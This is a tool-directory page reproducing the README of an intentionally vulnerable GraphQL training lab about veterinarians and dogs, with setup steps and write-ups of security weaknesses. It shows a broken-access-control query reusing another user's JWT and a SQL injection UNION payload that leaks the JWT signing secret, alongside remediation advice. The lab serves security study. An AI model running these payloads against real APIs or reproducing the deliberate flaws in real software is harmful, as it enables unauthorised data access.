Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
poc-graphql — Research on GraphQL from an AppSec point of view. | Kitploit
Tools/GitHubGitHub/righettod/poc-graphql
Vulnerability AnalysisWeb Application ExploitationAPI Security TestingPenetration TestingLearning & EducationLabs & PracticeArchived
GitHubrighettod/poc-graphql

poc-graphql

Research on GraphQL from an AppSec point of view.

View Repository
41859153 years agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Build and deploy the image

Table Of Content

  • Table Of Content
  • Research on GraphQL
    • Objective
    • Labs
    • Deploying on Docker
    • Security weaknesses
      • Authorization
        • Issue
        • Reco
      • Injection
        • Issue
        • Reco
      • Resource exhaustion
        • Issue
        • Reco
      • Exposure of private data
        • Issue
        • Reco
      • Exposure of technical information in case of unexpected error
        • Issue
        • Reco
      • Insecure Direct Object Reference
        • Issue
      • Exposure of the API to the wrong sphere of clients
        • Issue
          • Subscriptions WebSocket endpoint default enabling
          • Cross-Origin Resource Sharing default enabling
        • Reco
    • Discovery queries
    • References used
      • GraphQL
      • Labs

Research on GraphQL

Objective

  1. Study what is GraphQL.
  2. Analyse the usage of GraphQL from an AppSec point of view (attacks and defenses).
  3. Identify potential weaknesses on which attacks can be leveraged.

Labs

A labs has been created in order to study the different issues, this one take the context of a Veterinary managing healthcare of dogs.

The labs was developed using IntelliJ IDEA Community Edition.

Domains used are the following:

# Define in host file
127.0.0.1 localhost
127.0.0.1 domain1.local
127.0.0.1 domain2.local

There is the labs conditions and assumptions:

  • A Veterinary can be associated with 0 or N dogs.
  • A Dog can be associated with 0 or 1 Veterinary.
  • A Veterinary possess a property named Popularity present into the storage system (database) but it must no be accessed by GraphQL client because it is a sensitive information.
  • The GraphQL data consumption point of view is the Veterinary. Dog information are public.
  • The lab is explicitly a vulnerable application in which several vulnerabilities has been implemented and are identified using the [VULN] marker in comments.
  • Regarding the authentication, a fake 3rd party service has been implemented (via a servlet) and return a JWT token containing the Veterinary name into the token.

Once started via the launch configuration present into the project or the command line mvn spring-boot:run, the labs is available on these endpoints:

  • GraphiQL
  • GraphQL

To package the application, as a portable jar file, use the command mvn package (a pre-built jar file is available here):

  • The jar file will be created in the folder target and will be named graphql-poc.jar.
  • Use the command java -jar graphql-poc.jar to run the application.

Deploying on Docker

The image is published every day on DockerHub

In order to deploy the application in a docker container follow the steps:

  1. Make sure you have docker installed.
  2. git clone the repository.
  3. Change into the cloned directory.
  4. Build the docker image using docker build -t poc-graphql .
  5. Now an image called poc-graphql:latest has been created on your machine.
  6. Run the container using docker run -p 8080:8080 poc-graphql:latest
  7. Access the lab using the following endpoints:
    • GraphiQL
    • GraphQL

Security weaknesses

Authorization

broken access control

CWE-285

Issue

As GraphQL is based on a single endpoint on which every requests is sent and as authorization is out of scope of the specification (no built-in features).

It's up to the application to implements an authorization logic.

In my labs I have a vulnerability on this point because the verification of the access token do not verify that the token belong to the veterinary passed in veterinaryId

Example:

I ask a access token for Dr Julien that have the identifier 3 in the storage by sending this GraphQL request:

query getAccessToken {
  auth(veterinaryName: "Julien")
}

I receive the access token in the following GraphQL response:

{
  "data": {
    "auth": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJhdWQiOiJwb2MiLCJzdWIiOiJKdWxpZW4iLCJpc3MiOiJBdXRoU3lzdGVtIiwiZXhwIjoxNTQ2NDQyOTAyfQ.H9A-vXRsiivFGShtdhiR3N2lSDDx-sNqbbJxMRNnExI"
  }
}

I send a GraphQL request to the query myInfo(...) using the obtained access token BUT I specify the identifier 2 that the one of Dr Benoit:

query brokenAccessControl {
  myInfo(accessToken:"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJhdWQiOiJwb2MiLCJzdWIiOiJKdWxpZW4iLCJpc3MiOiJBdXRoU3lzdGVtIiwiZXhwIjoxNTQ2NDQyOTAyfQ.H9A-vXRsiivFGShtdhiR3N2lSDDx-sNqbbJxMRNnExI", veterinaryId: 2){
    id, name, dogs {
      name
    }
  }
}

I receive in the GraphQL response the list of Dogs associated with Dr Benoit:

{
  "data": {
    "myInfo": {
      "id": 2,
      "name": "Benoit",
      "dogs": [
        {
          "name": "Babou"
        },
        {
          "name": "Baboune"
        },
        {
          "name": "Babylon"
        },
    ...

Reco

With GraphQL we passed from a authorization matrix using Role x Feature to data level security using Role x Data because the also a single endpoints. User identity and roles must be passed to the top layer in charge grabbing the data (on act on) in order apply a verification using user identity prior to grab the data.

Injection

CWE-20 / CWE-116

Issue

According to how the information from the GraphQL request query/mutation/subscription are used by the GraphQL server to act on datastores there possibility for injection.

In my labs I have a vulnerability on this point about SQLi in query dogs(namePrefix: String, limit: Int = 500): [Dog!] because the parameter namePrefix is used in string concatenation to build a SQL query.

Example:

I send this GraphQL request in order to list the content of the CONFIG table

query sqli {
  dogs(namePrefix: "ab%' UNION ALL SELECT 50 AS ID, C.CFGVALUE AS NAME, NULL AS VETERINARY_ID FROM CONFIG C LIMIT ? -- ", limit: 1000) {
    id
    name
  }
}

I receive in the GraphQL response the secret used to sign JWT token along the name of the dog for which the name start ab:

{
  "data": {
    "dogs": [
      {
        "id": 1,
        "name": "Abi"
      },
      {
        "id": 2,
        "name": "Abime"
      },
      {
        "id": 50,
        "name": "$Nf!S?(.}DtV2~:Txw6:?;D!M+Z34^"
      }
    ]
  }
}

About XSS, it's interesting to note that the GraphQL response reflect the parameter sent in case of validation fail on the request sent.

Example:

I send this GraphQL request to the query myInfo(accessToken: String!, veterinaryId: Int!): Veterinary, i replace the Veterinary identifier (that is an integer) by a String XSS payload:

Download Tool